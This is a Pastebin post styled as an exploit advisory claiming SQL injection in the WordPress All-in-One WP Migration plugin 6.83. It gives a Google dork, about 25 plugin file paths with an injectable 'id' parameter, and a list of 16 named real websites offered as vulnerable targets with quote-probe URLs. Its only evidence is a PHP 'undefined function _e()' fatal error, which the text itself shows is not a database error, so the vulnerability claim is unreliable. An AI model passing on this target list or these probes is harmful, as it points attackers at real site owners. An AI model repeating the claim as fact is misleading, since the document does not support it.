KingSkrupellos

WordPress All-in-One WP Migration Plugins 6.83 SQL Injection

Jan 27th, 2019
86
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 5.52 KB | None | 0 0
  1. ####################################################################
  2.  
  3. # Exploit Title : WordPress All-in-One WP Migration Plugins 6.83 SQL Injection
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 28/01/2019
  7. # Vendor Homepage : servmask.com
  8. # Software Download Link : downloads.wordpress.org/plugin/all-in-one-wp-migration.6.83.zip
  9. # Software Information Link : wordpress.org/plugins/all-in-one-wp-migration/
  10. # Software Version : 6.83
  11. # Tested On : Windows and Linux
  12. # Category : WebApps
  13. # Exploit Risk : Medium
  14. # Google Dorks : inurl:''/wp-content/plugins/all-in-one-wp-migration/''
  15. # Vulnerability Type : CWE-89 [ Improper Neutralization of
  16. Special Elements used in an SQL Command ('SQL Injection') ]
  17.  
  18. ####################################################################
  19.  
  20. # SQL Injection Exploit :
  21. **********************
  22.  
  23. /wp-content/plugins/all-in-one-wp-migration/all-in-one-wp-migration.php?id=[SQL Injection]
  24.  
  25. /wp-content/plugins/all-in-one-wp-migration/loader.php?id=[SQL Injection]
  26.  
  27. /wp-content/plugins/all-in-one-wp-migration/uninstall.php?id=[SQL Injection]
  28.  
  29. /wp-content/plugins/all-in-one-wp-migration/lib/model/class-ai1wm-template.php?id=[SQL Injection]
  30.  
  31. /wp-content/plugins/all-in-one-wp-migration/lib/model/http/class-ai1wm-http-curl.php?id=[SQL Injection]
  32.  
  33. /wp-content/plugins/all-in-one-wp-migration/lib/model/http/class-ai1wm-http-stream.php?id=[SQL Injection]
  34.  
  35. /wp-content/plugins/all-in-one-wp-migration/lib/vendor/servmask/archiver/class-ai1wm-compressor.php?id=[SQL Injection]
  36.  
  37. /wp-content/plugins/all-in-one-wp-migration/lib/vendor/servmask/archiver/class-ai1wm-extractor.php?id=[SQL Injection]
  38.  
  39. /wp-content/plugins/all-in-one-wp-migration/lib/vendor/servmask/database/class-ai1wm-database-mysql.php?id=[SQL Injection]
  40.  
  41. /wp-content/plugins/all-in-one-wp-migration/lib/vendor/servmask/database/class-ai1wm-database-mysqli.php?id=[SQL Injection]
  42.  
  43. /wp-content/plugins/all-in-one-wp-migration/lib/view/backups/index.php?id=[SQL Injection]
  44.  
  45. /wp-content/plugins/all-in-one-wp-migration/lib/view/common/leave-feedback.php?id=[SQL Injection]
  46.  
  47. /wp-content/plugins/all-in-one-wp-migration/lib/view/common/report-problem.php?id=[SQL Injection]
  48.  
  49. /wp-content/plugins/all-in-one-wp-migration/lib/view/export/index.php?id=[SQL Injection]
  50.  
  51. /wp-content/plugins/all-in-one-wp-migration/lib/view/import/index.php?id=[SQL Injection]
  52.  
  53. /wp-content/plugins/all-in-one-wp-migration/lib/view/updater/check.php?id=[SQL Injection]
  54.  
  55. /wp-content/plugins/all-in-one-wp-migration/lib/view/updater/modal.php?id=[SQL Injection]
  56.  
  57. /wp-content/plugins/all-in-one-wp-migration/lib/view/main/backups-htaccess-notice.php?id=[SQL Injection]
  58.  
  59. /wp-content/plugins/all-in-one-wp-migration/lib/view/main/backups-index-notice.php?id=[SQL Injection]
  60.  
  61. /wp-content/plugins/all-in-one-wp-migration/lib/view/main/backups-path-notice.php?id=[SQL Injection]
  62.  
  63. /wp-content/plugins/all-in-one-wp-migration/lib/view/main/backups-webconfig-notice.php?id=[SQL Injection]
  64.  
  65. /wp-content/plugins/all-in-one-wp-migration/lib/view/main/get-support.php?id=[SQL Injection]
  66.  
  67. /wp-content/plugins/all-in-one-wp-migration/lib/view/main/multisite-notice.php?id=[SQL Injection]
  68.  
  69. /wp-content/plugins/all-in-one-wp-migration/lib/view/main/storage-index-notice.php?id=[SQL Injection]
  70.  
  71. /wp-content/plugins/all-in-one-wp-migration/lib/view/main/storage-path-notice.php?id=[SQL Injection]
  72.  
  73. ####################################################################
  74.  
  75. # Example Vulnerable Sites :
  76. *************************
  77.  
  78. [+] fsbfundingplatform.co.uk/wp-content/plugins/all-in-one-wp-migration/lib/view/export/index.php?id=1%27
  79.  
  80. [+] amerizonaproducts.com/wp-content/plugins/all-in-one-wp-migration/loader.php?id=1%27
  81.  
  82. [+] zed.digital/wp-content/plugins/all-in-one-wp-migration/loader.php?id=1%27
  83.  
  84. [+] vmfijnmetaal.nl/wp-content/plugins/all-in-one-wp-migration/loader.php?id=1%27
  85.  
  86. [+] slaughterhousetucson.com/wp-content/plugins/all-in-one-wp-migration/loader.php?id=1%27
  87.  
  88. [+] liila.fi/wp-content/plugins/all-in-one-wp-migration/loader.php?id=1%27
  89.  
  90. [+] rpl.eng.br/backup/wp-content/plugins/all-in-one-wp-migration/loader.php?id=1%27
  91.  
  92. [+] swartinstallatietechniek.nl/wp-content/plugins/all-in-one-wp-migration/loader.php?id=1%27
  93.  
  94. [+] ampsurf.org/wp-content/plugins/all-in-one-wp-migration/loader.php?id=1%27
  95.  
  96. [+] 7hillskampala.com/wp-content/plugins/all-in-one-wp-migration/loader.php?id=1%27
  97.  
  98. [+] ktdoctor.com/wp-content/plugins/all-in-one-wp-migration/loader.php?id=1%27
  99.  
  100. [+] iasca.org/wp-content/plugins/all-in-one-wp-migration/loader.php?id=1%27
  101.  
  102. [+] icehatdisharc.org/demo/wp-content/plugins/all-in-one-wp-migration/loader.php?id=1%27
  103.  
  104. [+] chefleticia.com/wp-content/plugins/all-in-one-wp-migration/loader.php?id=1%27
  105.  
  106. [+] evangelbible.org/wp-content/plugins/all-in-one-wp-migration/loader.php?id=1%27
  107.  
  108. [+] americadecali.co/wp-content/plugins/all-in-one-wp-migration/loader.php?id=1%27
  109.  
  110. ####################################################################
  111.  
  112. # Example SQL Database Error :
  113. ******************************
  114.  
  115. Fatal error: Uncaught Error: Call to undefined function _e() in /home/marcusg2
  116. /public_html/wp-content/plugins/all-in-one-wp-migration/lib/view/export/index.php:31
  117. Stack trace: #0 {main} thrown in /home/marcusg2/public_html/wp-content
  118. /plugins/all-in-one-wp-migration/lib/view/export/index.php on line 31
  119.  
  120. ####################################################################
  121.  
  122. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  123.  
  124. ####################################################################
Add Comment
Please, Sign In to add comment